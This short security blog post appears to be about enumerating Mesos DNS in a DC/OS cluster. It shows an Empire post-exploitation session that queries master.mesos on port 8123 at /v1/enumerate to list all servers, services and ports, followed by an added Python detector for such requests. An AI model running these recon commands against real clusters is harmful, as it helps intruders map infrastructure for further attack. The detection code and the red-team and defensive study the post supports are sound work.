OWNerchestration - Mesos DNS Enumeration

Mesos also provides its own internal DNS service called “Mesos DNS”, which is available via an HTTP REST API. It is often the most useful service to query, as it is frequently a one-stop shop for information on all servers, services, and associated TCP ports.

An attacker can interact with Mesos DNS via the following Empire modules…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set Target master.mesos
(Empire: python/situational_awareness/network/http_rest_api)> set Path /v1/enumerate
(Empire: python/situational_awareness/network/http_rest_api)> set Port 8123
(Empire: python/situational_awareness/network/http_rest_api)> execute
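
To detect the query shown above, the following added example (not from the original post or from Empire) scans HTTP request records for calls to /v1/enumerate on port 8123 that come from sources outside an expected-client allowlist. The record format, the sample lines and the 10.0.1.0/24 allowlist are constructed assumptions; adapt the parser to whatever proxy or network sensor actually sees this traffic.

```python
import ipaddress
from urllib.parse import urlsplit

MESOS_DNS_PORT = 8123             # port used in the session above
ENUMERATE_PATH = "/v1/enumerate"  # path used in the session above

# Constructed sample records in an assumed format (not real logs):
# timestamp src_ip dst_host dst_port method uri status
SAMPLE_LOG = """\
2024-01-01T10:00:01Z 10.0.1.5 master.mesos 8123 GET /v1/version 200
2024-01-01T10:02:17Z 10.0.4.23 master.mesos 8123 GET /v1/enumerate 200
2024-01-01T10:02:40Z 10.0.1.5 master.mesos 8123 GET /v1/enumerate 200
2024-01-01T10:03:02Z 10.0.4.23 master.mesos 8123 GET /v1/enumerate/?x=1 200
2024-01-01T10:03:09Z 10.0.4.23 master.mesos 80 GET /v1/enumerate 404
truncated line
"""

def parse_record(line):
    """Return a dict for a well-formed record, or None for anything else."""
    parts = line.split()
    if len(parts) != 7:
        return None
    ts, src, host, port, method, uri, status = parts
    try:
        return {"ts": ts, "src": ipaddress.ip_address(src), "host": host,
                "port": int(port), "method": method,
                # Drop query string and trailing slash before comparing paths.
                "path": urlsplit(uri).path.rstrip("/"),
                "status": int(status)}
    except ValueError:
        return None

def find_enumeration(log_text, allowed_nets):
    """Flag full enumeration requests from sources outside allowed_nets."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    alerts = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or rec["port"] != MESOS_DNS_PORT:
            continue
        if rec["path"] != ENUMERATE_PATH:
            continue
        if any(rec["src"] in net for net in nets):
            continue  # expected client, e.g. a service-discovery sidecar
        alerts.append((rec["ts"], str(rec["src"]), rec["status"]))
    return alerts

if __name__ == "__main__":
    for alert in find_enumeration(SAMPLE_LOG, ["10.0.1.0/24"]):
        print("Mesos DNS enumerate from unexpected source:", alert)
```

A 200 status in an alert means the full record set was returned to that source, so treat the source host as a priority for triage.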

You can see a quick overview of creating an Empire pyInstaller ELF binary and performing recon within a DC/OS cluster in the following video…

Bryce Kunz